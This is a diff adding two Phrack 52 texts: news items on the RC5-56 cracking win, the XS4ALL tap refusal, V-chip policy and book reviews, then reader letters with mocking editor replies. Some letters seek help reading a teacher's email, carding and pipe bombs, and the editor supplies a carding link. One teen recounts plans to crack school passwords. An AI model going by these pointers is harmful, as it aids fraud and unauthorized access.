+The winning key was found by Peter Stuer <peter@dinf.vub.ac.be> with
+an Intel Pentium Pro 200 running Windows NT Workstation, working for
+the STARLab Bovine Team coordinated by Jo Hermans
+<Jo.Hermans@vub.ac.be> and centered in the Computer Science
+Department (DINF) of the Vrije Universiteit (VUB) in Brussels,
+Belgium.  (http://dinf.vub.ac.be/bovine.html/).  Jo's only comments
+were that "$1000 will buy a lot of beer" and that he wished that the
+solution had been found by a Macintosh, the platform that represented
+the largest portion of his team's cracking power.  Congratulations
+Peter and Jo!
+
+Of the US$10000 prize from RSA Labs, they will receive US$1000 and
+plan to host an unforgettable party in celebration of our collective
+victory.  If you're anywhere near Brussels, you might want to find
+out when the party will be held.  US$8000, of course, is being
+donated to Project Gutenberg (http://www.promo.net/pg/) to assist
+them in their continuing efforts in converting literature into
+electronic format for the public use.  The remaining US$1000 is being
+retained by distributed.net to assist in funding future projects.
+
+Equally important are the thanks, accolades, and congratulations due
+to all who participated and contributed to the Bovine RC5-56 Effort!
+The thousands of teams and tens of thousands of individuals who have
+diligently tested key after key are the reason we are so successful.
+
+The thrill of finding the key more than compensates for the sleep,
+food, and free time that we've sacrificed!
+
+Special thanks go to all the coders and developers, especially Tim
+Charron, who has graciously given his time and expertise since the
+earliest days of the Bovine effort.  Thanks to all the coordinators
+and keyserver operators: Chris Chiapusio, Paul Chvostek, Peter
+Denitto, Peter Doubt, Mishari Muqbil,  Steve Sether, and Chris
+Yarnell.  Thanks to Andrew Meggs, Roderick Mann, and Kevyn Shortell
+for showing us the true power of the Macintosh and the strength of
+its users.  We'd also like to thank Dave Avery for attempting to
+bridge the gap between Bovine and the other RC5 efforts.
+
+Once again, a heartfelt clap on the back goes out to all of us who
+have run the client.  Celebrations are in order.  I'd like to invite
+any and all to join us on the EFNet IRC network channel #rc5 for
+celebrations as we regroup and set our sights on the next task.  Now
+that we've proven the limitations of a 56-bit key length, let's go
+one further and demonstrate the power of distributed computing!  We
+are, all of us, the future of computing.  Join the excitement as the
+world is forced to take notice of the power we've harnessed.
+
+Moo and a good hearty laugh.
+
+Adam L. Beberg - Client design and overall visionary
+Jeff Lawson - keymaster/server network design and morale booster
+David McNett - stats development and general busybody
+
+0xc>-------------------------------------------------------------------------
+
+Title: Kashpureff in custody.
+Source: Marc Hurst <mhurst@fastlane.ca>
+Author: Marc Hurst <mhurst@fastlane.ca>
+Date: Fri, 31 Oct 1997 10:40:20 -0500 (EST)
+
+
+ Eugene Kashpureff, known for his redirect of the NSI web page,
+ was apprehended this morning in Toronto by undercover RCMP
+ detectives.
+
+ Pending a deportation hearing, he will be returned to New York to
+ face Felony Wire Fraud charges that were sworn out against him
+ after he had settled out of court with NSI in regard to their
+ civil suit.
+
+ Early in the week Eugene relinquished control of the Alternic to
+ an adhoc industry group and that group will be making an
+ announcement in the next few days.
+
+ A this time I have no further information to volunteer.
+
+ Sincerely
+ Marc Hurst
+
+0xd>-------------------------------------------------------------------------
+
+Title: XS4ALL refuses Internet tap
+Source: Press Release
+Author: Maurice Wessling
+Date: November 13th 1997, Amsterdam, Netherlands.
+
+
+XS4ALL Internet is refusing to comply with an instruction from the
+Dutch Ministry of Justice that it should tap the Internet traffic
+of one of its users as part of an investigation. XS4ALL has
+informed the Ministry that in its view the instruction lacks any
+adequate legal basis.  The company's refusal makes it liable for a
+penalty but XS4ALL is hoping for a trial case to be brought in the
+near future so that a court can make a pronouncement.
+
+On Friday October 31st, a detective and a computer expert from the
+Forensic Science Laboratory issued the instruction to XS4ALL. The
+Ministry of Justice wants XS4ALL to tap for a month all Internet
+traffic to and from this user and then supply the information to
+the police. This covers e-mail, the World Wide Web, news groups,
+IRC and all Internet services that this person uses. XS4ALL would
+have to make all the technical arrangements itself.
+
+As far as we are aware, there is no precedent in the Netherlands
+for the Ministry of Justice issuing such a far-reaching
+instruction to an Internet provider. The detectives involved also
+acknowledge as much. Considering that a national meeting of
+Examining judges convened to discuss the instruction, one may
+appreciate just how unprecedented this situation is. Hitherto,
+instructions have mainly been confined to requests for personal
+information on the basis of an e-mail address.
+
+XS4ALL feels obliged in principle to protect its users and their
+privacy. Furthermore, XS4ALL has a commercial interest, since it
+must not run the risk of action being brought by users under Civil
+Law on account of unlawful deeds. This could happen with such an
+intervention by the provider which is not based in law. Finally,
+it is important from the social point of view that means of
+investigation have adequate statutory basis. To comply with the
+instruction could act as an undesirable precedent which could have
+a major impact on the privacy of all Internet users in the
+Netherlands.
+
+XS4ALL has no view on the nature of the investigation itself or
+the alleged crimes. It is happy to leave the court to decide that.
+Nor will XS4ALL make any comment on the content of the study or
+the region in which this is occurring for it is not its intention
+that the investigation should founder. XS4ALL has proposed in vain
+to the examining judge that the instruction be recast in terms
+which ensures the legal objections are catered for.
+
+The Ministry of Justice based its claim on Article 125i of the
+Penal Code. This article was introduced in 1993 as part of the
+Computer Crime Act. It gives the examining judge the option of
+advising third parties during statutory preliminary investigations
+to provide data stored in computers in the interest of
+establishing the truth. According to legal history, it was never
+the intention to apply this provision to an instruction focused on
+the future. Legislators are still working to fill this gap in the
+arsenal of detection methods, by analogy with the Ministry of
+Justice tapping phone lines (125g of the Penal Code). The Dutch
+Constitution and the European Convention on the Protection of
+Human Rights demand a precise statutory basis for violating basic
+rights such as privacy and confidentiality of correspondence. The
+Ministry clearly does not wish to wait for this and is now
+attempting to use Article 125i of the Penal Code, which is not
+intended for this purpose, to compel providers themselves to start
+tapping suspect users. The Ministry of Justice is taking the risk
+of the prosecution of X, in the context of which the instruction
+was issued to XS4ALL, running aground on account of using illegal
+detection methods.  Here, again, XS4ALL does not wish to be liable
+in any respect in this matter.
+
+For information please contact:
+
+XS4ALL
+Maurice Wessling
+email: maurice@xs4all.nl
+http://www.xs4all.nl/
+
+0xf>-------------------------------------------------------------------------
+
+Title: The FCC Wants V-Chip in PCs too
+Source: Cyber-Liberties Update
+Author: 
+Date: Monday, November 3, 1997
+
+
+Mandating that all new televisions have built-in censorship technology
+is not the only thing that the Federal Communications Commission (FCC)
+is seeking, said ACLU Associate Director Barry Steinhardt, it is also
+looking to require that the same technology be added to all new personal
+computers.
+
+Last year, culminating a protracted campaign against TV violence,
+Congress passed the Telecommunications Act of 1996, a law requiring that
+new televisions be equipped with the so-called V-chip.  The V-chip is a
+computerized chip capable of detecting program ratings and blocking
+adversely rated programs from view.
+
+Now, the FCC has announced that it is soliciting public comments through
+November 24, on the idea of placing V-chips inside personal computers
+since some are capable of delivering television programming.
+
+^SAt the time the V-chip was being considered we warned that with the
+growing convergence between traditional television (broadcast and cable)
+and the Internet, it was only a matter of time before the government
+would move to require that the V-chip be placed in PC's. Now that has
+happened,^T Steinhardt said.
+
+^SHardwiring censorship technology into the PC is part of the headlong
+rush to
+a scheme of rating and blocking Internet content that will turn the
+Internet into a bland homogenized medium in which only large corporate
+interest will have truly free speech,^T Steinhardt said.
+
+The ACLU has criticized the mandatory requirement of V-chip arguing that
+it is a form of censorship clearly forbidden by the First Amendment.
+
+^SAlthough its supporters claim the V-chip gives parents control over
+their
+children's viewing habits, in fact it will function as a governmental
+usurpation of parental control,^T said Solange Bitol, Legislative Counsel
+for the ACLU^Rs Washington National Office.
+
+^SUnder the legislation, it is the government (either directly or by
+coercing private industry), and not the parents, that will determine how
+programs will be rated. If a parent activates the V-chip, all programs
+with a "violent" rating will be blocked. What kind of violence will be
+censored? Football games? War movies? News reports?^T she added.
+
+The ACLU is opposed to mandatory addition or use of censoring
+technologies and we will be filing comments with the FCC later this
+month. We believe people are smart enough to turn off their television
+sets or PCs on their own if they don^Rt like what they see.
+
+Tell the FCC what you think.  Submit comments to them online at
+<http://www.fcc.gov/vchip/>, and send us a copy as well so that we make
+sure your voice is heard.  E-mail them to CSehgal@aclu.org.
+
+                                =-=
+
+To subscribe to the ACLU Cyber-Liberties Update, send a message to
+majordomo@aclu.org with "subscribe Cyber-Liberties" in the body of your
+message. To terminate your subscription, send a message to
+majordomo@aclu.org with "unsubscribe Cyber-Liberties" in the body.
+
+
+1x1>-------------------------------------------------------------------------
+
+Book Title: Underground
+Poster: George Smith via Crypt Newsletter
+
+Date: 27 Aug 97 00:36:12 EDT
+From: "George Smith [CRYPTN]" <70743.1711@CompuServe.COM>
+Subject: File 5--An "Underground" Book on Australian Hackers Burns the Mind
+
+Source - CRYPT NEWSLETTER 44
+
+AN "UNDERGROUND" BOOK ON AUSTRALIAN HACKERS BURNS THE MIND
+
+Crypt News reads so many bad books, reports and news pieces on
+hacking and the computing underground that it's a real pleasure to
+find a writer who brings genuine perception to the subject.
+Suelette Dreyfus is such a writer, and "Underground," published by
+the Australian imprint, Mandarin, is such a book.
+
+The hacker stereotypes perpetrated by the mainstream media include
+descriptions which barely even fit any class of real homo sapiens
+Crypt News has met.  The constant regurgitation of idiot slogans
+-- "Information wants to be free," "Hackers are just people who
+want to find out how things work" -- insults the intelligence.
+After all, have you ever met anyone who wouldn't want their access
+to information to be free or who didn't admit to some curiosity
+about how the world works?  No -- of course not.  Dreyfus'
+"Underground" is utterly devoid of this manner of patronizing
+garbage and the reader is the better for it.
+
+"Underground" is, however, quite a tale of human frailty.  It's
+strength comes not from the feats of hacking it portrays --and
+there are plenty of them -- but in the emotional and physical cost
+to the players. It's painful to read about people like Anthrax, an
+Australian 17-year old trapped in a dysfunctional family.
+Anthrax's father is abusive and racist, so the son --paradoxically
+-- winds up being a little to much like him for comfort,
+delighting in victimizing complete strangers with mean jokes and
+absorbing the anti-Semitic tracts of Louis Farrakhan.  For no
+discernible reason, the hacker repetitively baits an old man
+living in the United States with harassing telephone calls.
+Anthrax spends months of his time engaged in completely pointless,
+obsessed hacking of a sensitive U.S. military system.  Inevitably,
+Anthrax becomes entangled in the Australian courts and his life
+collapses.
+
+Equally harrowing is the story of Electron whose hacking pales in
+comparison to his duel with mental illness. Crypt News challenges
+the readers of "Underground" not to squirm at the image of
+Electron, his face distorted into a fright mask of rolling eyes
+and open mouth due to tardive dyskinesia, a side-effect of being
+put on anti-schizophrenic medication.
+
+Dreyfus expends a great deal of effort exploring what happens when
+obsession becomes the only driving force behind her subjects'
+hacking.  In some instances, "Underground's" characters degenerate
+into mental illness, others try to find solace in drugs.  This is
+not a book in which the hackers declaim at any great length upon
+contorted philosophies in which the hacker positions himself as
+someone whose function is a betterment to society, a lubricant of
+information flow, or a noble scourge of bureaucrats and tyrants.
+Mostly, they hack because they're good at it, it affords a measure
+of recognition and respect -- and it develops a grip upon them
+which goes beyond anything definable by words.
+
+Since this is the case, "Underground" won't be popular with the
+goon squad contingent of the police corp and computer security
+industry.  Dreyfus' subjects aren't the kind that come neatly
+packaged in the
+"throw-'em-in-jail-for-a-few-years-while-awaiting-trial"
+phenomenon that's associated with America's Kevin Mitnick-types.
+However, the state of these hackers -- sometimes destitute,
+unemployable or in therapy -- at the end of their travails is
+seemingly quite sufficient punishment.
+
+Some things, however, never change.  Apparently, much of
+Australia's mainstream media is as dreadful at covering this type
+of story as America's.  Throughout "Underground," Dreyfus includes
+clippings from Australian newspapers featuring fabrications and
+exaggeration that bare almost no relationship to reality.  Indeed,
+in one prosecution conducted within the United Kingdom, the
+tabloid press whipped the populace into a blood frenzy by
+suggesting a hacker under trial could have affected the outcome of
+the Gulf War in his trips through U.S. computers.
+
+Those inclined to seek the unvarnished truth will find
+"Underground" an excellent read.  Before each chapter, Dreyfus
+presents a snippet of lyric chosen from the music of Midnight Oil.
+It's an elegant touch, but I'll suggest a lyric from another
+Australian band, a bit more obscure, to describe the spirit of
+"Underground." From Radio Birdman's second album: "Burned my eye,
+burned my mind, I couldn't believe it . . . "
+  +++++++++
+
+["Underground: Tales of Hacking, Madness and Obsession on the
+Electronic Frontier" by Suelette Dreyfus with research by Julian
+Assange, Mandarin, 475 pp.]
+
+Excerpts and ordering information for "Underground" can be found
+on the Web at http://www.underground-book.com .
+
+George Smith, Ph.D., edits the Crypt Newsletter from Pasadena,
+CA.
+
+1x2>-------------------------------------------------------------------------
+
+Book Title: The Electronic Privacy Papers
+          : Documents on the Battle for Privacy in the Age of Surveillance
+        by: Bruce Schneier + David Banisar
+ publisher: John Wiley 1997
+     other: 747 pages, index, US$59.99
+
+_The Privacy Papers_ is not about electronic privacy in general: it covers
+only United States Federal politics, and only the areas of wiretapping
+and cryptography.  The three topics covered are wiretapping and the
+Digital Telephony proposals, the Clipper Chip, and other controls on
+cryptography (such as export controls and software key escrow proposals).
+
+The documents included fall into several categories.  There are broad
+overviews of the issues, some of them written just for this volume.
+There are public pronouncements and documents from various government
+bodies: legislation, legal judgements, policy statements, and so forth.
+There are government documents obtained under Freedom of Information
+requests (some of them partially declassified documents complete with
+blacked out sections and scrawled marginal annotations), which tell
+the story of what happened behind the scenes.  And there are newspaper
+editorials, opinion pieces, submissions to government enquiries, and
+policy statements from corporations and non-government organisations,
+presenting the response from the public.
+
+Some of the material included in _The Privacy Papers_ is available
+online, none of it is breaking news (the cut-off for material appears
+to be mid-to-late 1996), and some of the government documents included
+are rather long-winded (no surprise there).  It is not intended to be a
+"current affairs" study, however; nor is it aimed at a popular audience.
+_The Privacy Papers_ will be a valuable reference sourcebook for anyone
+involved with recent government attempts to control the technology
+necessary for privacy -- for historians, activists, journalists,
+lobbyists, researchers, and maybe even politicians.
+
+--
+
+%T	The Electronic Privacy Papers
+%S	Documents on the Battle for Privacy in the Age of Surveillance
+%A	Bruce Schneier
+%A	David Banisar
+%I	John Wiley
+%C	New York
+%D	1997
+%O	hardcover, bibliography, index
+%G	ISBN 0-471-12297-1
+%P	xvi,747pp
+%K	crime, politics, computing
+
+
+1x3>-------------------------------------------------------------------------
+
+Book Title: "Computer Security and Privacy: An Information Sourcebook:
+             Topics and Issues for the 21st Century"
+
+
+by Mark W. Greenia
+List: $29.95
+Publisher: Lexikon Services
+Win/Disk Edition
+Binding: Software
+Expected publication date: 1998
+ISBN: 0944601154
+
+
+[PWN: I haven't seen this one in stores, and no further information or
+      reviews have been found.]
+
+3x1>-------------------------------------------------------------------------
+
+ CDT POLICY POST Volume 3, Number 12                       August 11, 1997
+
+(1) CIVIL LIBERTIES GROUPS ASK FCC TO BLOCK FBI ELECTRONIC SURVEILLANCE
+    PROPOSAL
+
+The Center for Democracy and Technology and the Electronic Frontier
+Foundation today filed a petition with the Federal Communications
+Commission to block the FBI from using the 1994 "Digital Telephony" law to
+expand government surveillance powers.
+
+The law, officially known as the "Communications Assistance for Law
+Enforcement Act" (CALEA), was intended to preserve law enforcement
+wiretapping ability in the face of changes in communications technologies.
+In their filing, CDT and EFF argue that the FBI has tried to use CALEA to
+expand its surveillance capabilities by forcing telephone companies to
+install intrusive and expensive surveillance features that threaten privacy
+and violate the scope of the law.
+
+3x2>-------------------------------------------------------------------------
+
+Anti-Spam Bills in Congress
+
+Source - ACLU Cyber-Liberties Update, Tuesday, September 2, 1997
+
+Unsolicited e-mail advertisement, or "spam," has few fans on the
+net. Court battles have been waged between service providers, such
+as AOL and Compuserve, and spam advertisers, including Cyber
+Promotions, over whether the thousands of  messages sent to user
+e-mails can be blocked. Congress and several state legislatures
+have also stepped into the debate and have introduced some bills
+fraught with First Amendment problems because they ban commercial
+speech altogether or are content specific.
+
+[Laws against spam.. oh neat. So, how do they plan on enforcing it?]
+
+3x3>-------------------------------------------------------------------------
+
+JUSTICE DEPARTMENT CHARGES MICROSOFT WITH VIOLATING 1995 COURT ORDER
+
+Asks Court to Impose $1 Million a Day Fine if Violation Continues
+
+     WASHINGTON, D.C. -- The Department of Justice asked a
+federal court today to hold Microsoft Corporation--the world's
+dominant personal computer software company--in civil contempt
+for violating terms of a 1995 court order barring it from
+imposing anticompetitive licensing terms on manufacturers of
+personal computers.
+
+[PWN: Hey Bill.. nah nah nah, thptptptptptptp, nanny nanny boo boo]
+
+3x4>-------------------------------------------------------------------------
+
+Small Minds Think Alike
+Source - : fight-censorship@vorlon.mit.edu
+
+CyberWire Dispatch Bulletin
+
+Washington --In this boneyard of Washington, DC it doesn't take
+long for big dawgs and small alike to bark.  A couple of small
+ones yipped it up today.
+
+Rep. Marge (no relation to Homer) Roukema, R-N.J. and Sen. Lauch
+(??) Faircloth, R-N.C. introduced a bill to amend the
+Communications Act that would ban convicted sex offenders from
+using the Internet.
+
+[PWN: Oh yeah.. that will be easy to enforce.]
+
+3x5>-------------------------------------------------------------------------
+
+Cyber Promotions tossed offline 
+
+   Cyber Promotions tossed offline
+   By Janet Kornblum
+   September 19, 1997, 1:25 p.m. PT
+
+   Cyber Promotions, antispammers' enemy No. 1 on the Net, has once again
+   been dumped by its access provider.
+
+   Backbone provider AGIS cut off Cyber Promotions Wednesday, and the
+   company has been scrambling for another ISP since.
+
+[PWN: Hey Samford.. ha ha ha, nanny nanny, thptptptptp.]
+
+   "Ping-flood attacks observed originating from the West Coast into AGIS
+   and directed to the Washington and Philadelphia routers severely
+   degraded AGIS network performance to [an] unacceptable level...AGIS
+   had no alternative but to shut off services to Cyber Promotions,"
+   reads a statement that Wallace put on his page. He alleged that the
+   statement came from an AGIS engineer.
+
+[PWN: If a ping flood took them down this time...]
+
+
+
+----[  EOF
+
diff --git a/phrack52/2.txt b/phrack52/2.txt
new file mode 100644
index 0000000..fc461e9
--- /dev/null
+++ b/phrack52/2.txt
@@ -0,0 +1,1429 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 02 of 20
+
+
+-------------------------[  P H R A C K     52     L O O P B A C K
+
+
+--------[  Phrack Staff
+
+
+
+[ Ed. note:  The letters are perhaps editted for format, but generally not for
+  grammar and/or spelling.  I try not to correct the vernacular, as it often 
+  adds a colorful perspective to the letter in question. ]
+
+0x1>--------------------------------------------------------------------------
+
+[ P51-02@0x14: ...Xarthons submission about Linux IP_MASQ in Phrack 50... ]
+
+        In reply to Swift Griggs ranting about my stupidity,
+        (and disrespekt i recieved from the rest of the AOL community)
+
+        Swift:  the 'problem' in IP_MASQ which I reported was not meant
+        to be considered a security problem, rather a notification
+        of a potential problem, or at least this is what i was told.
+
+        i stole this 'problem' from a evil hacker who works for the NSA.
+        at the time, if i had been aware that the info i ripped from him
+        was totally false, i would have said so in the letter.
+        and believe me, if [named_removed] was awake more than 5 minutes
+        a day i would be severely anal at him for informing me of
+        this false intelligence.
+
+        the main thing the hacker/phracker/aol community needs to
+        learn from this event is that when giving information to be
+        ripped, it should be correct.  next time ill make sure
+        to reword the context i have pasted with GPM properly.
+
+        btw, i must apologize for the tabs in this letter, pico
+        has proven difficult to use.
+
+        i must go, i have to pry this gerbil off my flacid cock.
+
+        thanks, and keep hackin!
+
+        xarthon 
+  
+0x2>--------------------------------------------------------------------------
+
+[ P51-02@0x1b:  You have our permission to write r00t on your backpack. ]
+
+That may be the funniest response to a letter I have ever read.
+Your response to MICH Kabay was a close second.
+
+The wait was well worth it.  I would rather see quality Phrack 2 or 3 times a
+yar than crap delivered every 3 months.  I have to get back to reading now....
+
+pip (John)
+
+[ Go away Pip, nobody likes you. ]
+
+0x3>--------------------------------------------------------------------------
+
+[ P51-02@0x2c: I have a question regarding a certain piece of hardware... ]
+
+It's a barcode scanner used at some terminals, such as public libraries.  You 
+plug it in between the keyboard and the computer, and when you want to scan in 
+a barcode from a book being checked out or an item being purchased, you push 
+the button on the SCANNER and it outputs the barcode in ASCII numeric just as 
+if it had been typed in from the keyboard.  So, now ya know.
+
+Unknown/604
+             
+--
+
+d00d, that's a s00p3r s3kr3t CIA, FBI g0vt. c0nspir@cY k3yb0ard f1lt3r!!@@!21
+
+Actually, your mystery device sounds more like the "box" that connects between
+the keyboard and a barcode scanner.  The "SCANNER" connector is where you'd
+plug in a typical "wand" or "gun" barcode reader.  Not much you can do with it
+by itself, IMO.  Again, it might be something else, but that's what it sounds
+like to me.
+         
+nate@millcomm.com
+
+--
+
+What this sounds like is the interface from one of the wand or
+lightgun-type laser barcode readers. These can be seen in action at
+some of the retail outlets around here for reading barcodes from
+clothing price tags or whatnot.  One of those useful inventions that
+came out of turning 386's into POS terminals.
+
+It's probably useless without the accompaning wand, but you might keep
+it around and try to find the missing part.
+
+wiz
+
+-- 
+
+[ We received a gaggle of responses to this inquiry.  To those of you who sent 
+  in responses, our humblest thanks. ]
+
+0x4>--------------------------------------------------------------------------
+
+Hi!
+I need your help!
+Tell me, please, where I can found information via Internet
+about Carding (Scheme of reader/writer and etc.)
+thanks.
+Bye.
+
+[ http://www.etexguide.com/cardtricks ]
+
+0x5>--------------------------------------------------------------------------
+
+[ P50-03: Portable BBS Hacking by: Khelbin ]
+
+Dear Phrack,
+
+     An old article of mine entitled "Portable BBS Hacking" appeared in Phrack
+issue 50 under the line noise section.  In Phrack 51, a reader expressed that
+he/she was frustrated at not being able to apply the techniques that were
+described in my article.  Please publish this response in Phrack 52
+
+     Let me state right off the bat that "Portable BBS Hacking" was not
+written to specifically expose any one software-specific problem.  Instead,
+the article introduced a potential security threat to all BBS software so that
+SysOps around the globe could check for such vulnerabilities and correct the
+problem if it was present.  A 'mock' Renegade setup was used just because some
+software had to be used in order to explain the theory behind the attack.
+
+     Now to address the frustrated reader who is obviously aspiring to become
+an ever-so-elite BBS-h4x0r!  While I often enjoy toking on a crack pipe, this
+method was tested prior to writing this article.  It was tested on Renegade
+04-x quite some time ago (as the article had been written some time ago, but
+never published).  I currently run FreeBSD 2.2.2, so I havn't been able to do
+any more testing to help you hack BBS' and become ph33red.  *BUT*, I am sure
+that versions of THD ProScan (a utility to scan uploaded files for viruses and
+other problems) will foil this attack.  I am also sure (just by what I remember
+of how Renegade works) that If you follow the steps that I gave you in Phrack
+50 correctly, upload a file, and then the SysOp were to (X)tract files from
+that file into \temp that it would work.  I am also sure that there are other
+packages out there other than THD ProScan that do the same thing, but not in a
+secure fashion.  The methods described in "Portable BBS Hacking" will also work
+with these packages.  I hope you weren't just having Renegade check the file
+integrity with pkunzip -t or just view the contents of the zipfile.  Your
+response wasn't very specific so it's hard for me to be specific in this
+reply however, I can tell that you also enjoy an occasional joint of
+crack, so feel free to contact me sometime and we'll smoke!
+
+                                                Yours Truly,
+                                                Khelbin Sunvold
+
+0x6>--------------------------------------------------------------------------
+
+Hi,
+
+What program do I have to use in order to read the Phrack Magazine?
+
+Thank you,
+Adrian
+
+[ We at Phrack Magazine do not explicitly endorse any particular program, 
+  however, many 12 step programs work wonders: Narcotics Anonymous, Overeaters
+  Anonymous, Codependency Anonymous, Debtors Anonymous, Beyond Controloholism,
+  Science Fiction Addiction, etc.  Also try: 
+  `gzip -dc phrack.tgz | tar xvf -`. ]
+
+0x7>--------------------------------------------------------------------------
+
+Please allow me to introduce myself. My name is Itai Dor-on and I am a system 
+integrator From Israel.
+
+[ No introductions are necessary. ]
+
+I got the phrack.com address from one of the subscribers on the
+firewalls@GreatCircle.COM mailing list in response to my inquiry on smtp 
+exploits. (phrack 50)
+
+[ shattered:~/Phrack/50:~> grep -i SMTP * | grep -i exploit 
+  shattered:~>
+  There are no SMTP related exploits in Phrack 50. ]
+
+I downloaded the file but it seems that it is encoded in a format which I can 
+not read. I use windows 95/NT.  I would like to know if there is a special 
+viewer for the file.
+
+[ See above letter. ]
+
+Is there other informative information in the phrack.com site that is relevant 
+to Security exploits in tcpi/ip
+
+[ Phrack 48 - 52 ]
+
+I thank you in advance for any response
+
+Yours Truly,
+
+Itai Dor-on  
+
+0x8>--------------------------------------------------------------------------
+    
+Phrack is the best magazine of its kind I've ever seen !!! Maybe you could
+write something about tapping telephone wires in order to record data and
+fax on a portable tape recorder. I've read an article from Damnation that
+was pretty good, but maybe you could give me, and the other readers of
+course, some additional information. I'm also interested in hacking the
+E-mail server of my ISP in order to read my teacher's mail, so what kind of
+program do I need to do this ? I know his login but I don't know his
+password.  I've got a terminal program called Dialog that doesn't seem to
+be very useful, but maybe you know a better one ?!? Now, my last question:
+I'm using CuteFTP  to log on to my homepage's folder . One day I've found
+some write protected folders and files, so my question is how do I get
+access to these files and how do I go to other folders to which I'm not
+allowed to go (hidden,write-protected, etc.) ?
+
+Thank you very much in advance !
+
+Host 
+
+[ I had a flame all ready and prepared, but this letter really seems to set
+  itself on fire. ]
+
+0x9>--------------------------------------------------------------------------
+
+Hey guys, I'm a first time ready and, well duh, first time responder to
+yer mag...I must say that I am thoroughly impressed with what you've all
+put together...as a Linux user, it shall certainly be a very useful
+utility/resource for me...I just nabbed the 51st issue and it rocks thus
+far...downloading the other issues as I type this...just thought you might
+like to know ya got another reader who is overjoyed at getting off his
+lazy ass and finally reading yer mag which i've heard about in the past...
+Ezines never were something for me but i said fuckit and went for Phrack..
+your mag is the most informative and entertaining Ezine that i've seen to
+date (and i been on the 'net for 4+ years now...that might say something)
+anyhow, enuf blabber from me, L8!
+
+-GnEaThEg0d
+
+[ Well, thank you very much. ]
+
+0xa>--------------------------------------------------------------------------
+
+I'd like to congratulate Narbo on his brief introduction to CCS7.  I
+was begining to think that noone was interested in telecommunications
+anymore.
+
+[ Agreed.  Note that we would very much appreciate further submissions of 
+  this kind. ]
+
+One thing I'd like to add for Phrack's Japanese audience is that they are
+the odd balls when it comes to signaling data links.  While signaling data
+links are 56kbps in North America and 64kbps virutally everywhere else,
+Japan uses 4.8kbps links.  Actually I guess we, in North America, are
+also a little odd at 56kbps but at least it's closer to the norm.  :)
+
+
+-khelbin
+
+0xb>--------------------------------------------------------------------------
+
+Yea, I wanna subscribe to phrack..This is my e-mail
+address..noah6@juno.com...Sign me up if I'm writing the right place..if
+not..tell me how to subscribe
+later
+oh yea..I know I'm not supposed to ask..but I don't have internet
+access..I could use all the back issues of phrack in one big long letter
+if you could..I can't recieve files with this account..so if you could
+cut and paste or some shit...
+later
+
+[ Sure.  Let me get right on that.  Even better, what's your postal address?
+  I'll have the Phrack Tactical Team deployed to your house to come hit you
+  on the head with a tack hammer because you are a retard. ]
+
+0xc>--------------------------------------------------------------------------
+
+Good issue, by the way...
+
+[ Thanks! ]
+
+So whassup with the Milla pictures?  Did you mention them in P51-1 just to 
+taunt us?  How do you get the _non_ASCII version of P51?
+
+You're too cruel...  :-)
+
+JSRS
+
+[ Sorry.  That Carl's fault.  He's new. (Moo.  Moo moo.) ]
+
+0xd>--------------------------------------------------------------------------
+
+To the Anti-Christ,
+
+[ Apparently, there was a postal mix-up and we are now getting Satan's mail. ]
+
+   When I grow up I want to be just like you.  
+
+[ Great!  So, I'll see you at the next Klan-youth meeting? ]
+
+That said, can you walk the talk?  If so, I have a challenge for you.  
+
+[ 'walk the talk'?  Note:  This is email.  Something you've mailed to a
+  whiley bunch of knuckle-knobs.  And quite possibly something that could
+  be used to make others laugh at your expense.  In the future, take the time
+  to grammar and spell check your letters to minimize the emotional damage
+  you are bound to suffer. ]
+
+I am a neophyte in the
+DarkSide,and need some help catching/avoiding  a phreaker,hence the
+interest in your mag.   He breaks into phone lines at home and work.
+Tapes conversations and interjects various rude noises on important
+calls.  Do you have any ideas as to what I can/should do to protect my
+
+[ Sommy! ]
+
+privacy and catch this guy?  If this is not within your realm of
+expertise, can you refer me to someone for whom it is?
+
+[ Try the PHONE COMPANY. ]
+
+   Don't take my intial inquiry as anythng but an effort to become part
+of the hacker/phreaker world for the sake of my own protection.   I
+
+[ For your own protection, I suggest NOT becoming part of *any* community.
+  Live the rest of your life as a hermit inside a hollowed-out oaktree. ]
+
+understand there are many 'good' hackers in your world willing to offer
+assistance in this arena.
+
+Your assistance would be greatly appreciated.  Thanks.
+
+0xe>--------------------------------------------------------------------------
+
+Sirs,
+  First,thanks for the obvious hard work that goes into your 'zine.
+  I guess I'm what you what you would call a "tryin' to be".
+  I've got all the back issues and read some every day.I was just
+reading 51,and had to say that besides all the other great things in the
+'zine,it's great to see some people still have a great f*ckin' sense of
+humor.
+                           Thanx again,
+                             (to busy trying to learn to have come up
+                               with a cool handle)...R  
+
+[ Stop it.  I'll get a big head. ]
+
+0xf>--------------------------------------------------------------------------
+
+I am a newbie hacker/freaker/cracker/sometimes anarchist. I have read
+some of your first Phrack issues and I LOVED EM! Especially the bomb
+making!I am gonna try that stuff when I finally go to my dad's house
+later on this year....I wanna blow shit up!! I have a submission that
+you are gonna get sooner or later about making the ULTIMATE pipe
+bomb....it is REALLY destructive...
+
+THANK YOU
+
+Demonhawk   
+
+[ ATTN Deliquent parents: Increase Ritalin by 0.5 mg/Kg. ]
+
+0x10>-------------------------------------------------------------------------
+
+                                Day in the Life of a Teenage
+                                           Hacker:
+
+                                Story of My Current Non-Life
+
+                                             By:
+
+                                          Demonhawk
+
+        I wake up, staring at the ceiling for ten minutes before my mother
+finally walks in and says, "Time to get up!" I stand and dress myself. Wearing
+the only thing that I can think of that I like, blue jeans and just whatever
+shirt looks best at the time.
+        I go and comb my hair (walking to my mom's end of the trailer house to
+use that bathroom because mine doesn't have a mirror, nor a sink, nor more
+than 10x10 feet of space). I walk back to my room and get my books ready for
+school. The block schedual makes my backpack EXCRUTIATINGLY heavy on B days
+while on A days it is light as a feather.
+        I lay down-most of the time-and go back to sleep. Others I turn my
+computer's monitor on and type something for a while (my mom says it is bad to
+leave your computer on all night, WRONG! Little does she fuckin' know it is
+better to leave it on!). It is time to go to school and my mom drives me to t
+he middle school (Connally Middle School) where I go in and play on the
+computer suntil school starts (get there 30 mins early).
+        I go to my first class, still groggy from the little rest I had the
+night before while I lay awake in my bed pondering what I could do to the
+school's computer system. The recenlty installed network (Novell) was
+supposedly student proof (little do they know). I have the software and I
+could hack it easy. Crack the passwords that the teachers think they are so
+smart to have one that a student can't guess.
+        I think about the consequences of hacking 'em, then realize that it
+would be stupid to hack 'em, after all, I am the only one smart enough on the
+computers to hack em. I can crack Windows passwords (easy) with a boot disk
+(or even booting into dos).
+        Last year, I will remember angrily, I remember how I got a bum wrap
+for crashing a teacher's computer. I was on it then absent for a week and then
+come back to find out all fingers were being pointed at me. I got kicked off
